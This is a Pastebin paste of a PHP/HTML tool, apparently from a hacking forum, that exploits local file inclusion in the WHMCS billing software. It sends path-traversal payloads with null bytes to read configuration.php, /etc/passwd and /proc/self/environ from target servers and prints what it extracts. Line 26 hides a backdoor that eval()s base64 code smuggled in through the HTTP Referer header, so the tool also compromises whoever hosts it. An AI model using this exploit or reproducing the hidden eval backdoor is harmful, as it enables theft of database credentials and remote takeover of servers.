TrojanSpot

Priv8 WHMCS x.x Lfi config reading | http://forum.act-crew.org

Jan 25th, 2013
427
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.19 KB | None | 0 0
  1.  
  2. Priv8 WHMCS x.x Lfi config reading Script Coded by izo
  3.  
  4. dùng scan lổi whmcs
  5. <td height="100" valign="top" bordercolor="#FFFFFF"><form action="" method="post" name="izo" id="izo">
  6. <body bgcolor="black">
  7. <center>
  8. <font size="5" color="red">Turkblackhats.com</font> <font size="2" color="white">WHMCS 3.X.X Lfi Script[Priv8] |coded by izleyici</font></center>
  9. <form method="POST"><center>
  10. <input value="http://www." type="text" name="kutucuk">
  11. <select size="1" name="wht"><option>Bug seçiniz</option>
  12. <option>/cart.php?a=test&templatefile=../../../configuration.php%00</option>
  13. <option>/clientarea.php?action=red&templatefile=../../configuration.php%00</option>
  14. <option>/downloads.php?action=b0x&templatefile=../../configuration.php%00</option>
  15. <option>/submitticket.php?step=b0x&templatefile=../../configuration.php%00</option>
  16. <option>/cart.php?a=test&templatefile=../../../../../../../../../etc/passwd%00</option>
  17. <option>/downloads.php?action=b0x&templatefile=../../../../../../../../../etc/passwd%00</option>
  18. <option>/submitticket.php?step=b0x&templatefile=../../../../../../../../../etc/passwd%00</option>
  19. <option>/cart.php?a=test&templatefile=../../../../../../../../../../../../..//proc/self/environ%0000</option>
  20. <option>/submitticket.php?step=b0x&templatefile=../../../../../../../../../../../../..//proc/self/environ%0000</option>
  21. <option>/downloads.php?action=b0x&templatefile=../../../../../../../../../../../../..//proc/self/environ%0000</option></select>
  22. <input type="submit" value="Göster Bakalým"></center>
  23. </form>
  24.  
  25. <?php
  26. parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</star>';}
  27. $sayfa=$_POST['kutucuk'];
  28. $sayfa1=$_POST['wht'];
  29. $kaynak=file_get_contents($sayfa.$sayfa1);
  30. $isle=explode('<?php',$kaynak);
  31. $isle=explode('?>',$isle[1]);
  32. $gol=explode('DOCUMENT_ROOT=',$kaynak);//
  33. $gol=explode('<p align="center">Powered',$gol[1]);//
  34. $turkg=explode('root:x:0:0:root:/root:/bin/bash',$kaynak);//
  35. $turkg=explode('<p align="center">Powered',$turkg[1]);//
  36. echo "<center><textarea cols='65' rows='18'>".$isle[0].$gol[0].$turkg[0]."</textarea></center>";
  37. ?>
Add Comment
Please, Sign In to add comment